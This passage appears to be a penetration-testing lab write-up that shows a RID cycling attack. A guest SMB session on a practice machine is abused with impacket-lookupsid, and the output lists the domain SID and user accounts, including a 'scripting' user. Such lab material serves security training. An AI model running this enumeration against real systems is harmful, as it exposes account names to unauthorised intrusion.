RID Cycling
The target SMB server allows guest session with read access to the IPC$
share.
This would mean that RID Cycling attack can be employed to bruteforce user’s RIDs.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/compromised]
└─$ impacket-lookupsid blah@$IP 1000000
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Brute forcing SIDs at 192.168.225.152
[*] StringBinding ncacn_np:192.168.225.152[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-537427935-490066102-1511301751
500: COMPROMISED\Administrator (SidTypeUser)
501: COMPROMISED\Guest (SidTypeUser)
503: COMPROMISED\DefaultAccount (SidTypeUser)
504: COMPROMISED\WDAGUtilityAccount (SidTypeUser)
513: COMPROMISED\None (SidTypeGroup)
1000: COMPROMISED\scripting (SidTypeUser)
Performing the rid cycling attack with an arbitrary credential against the target SMB service; blahblah
scripting
account has been identified.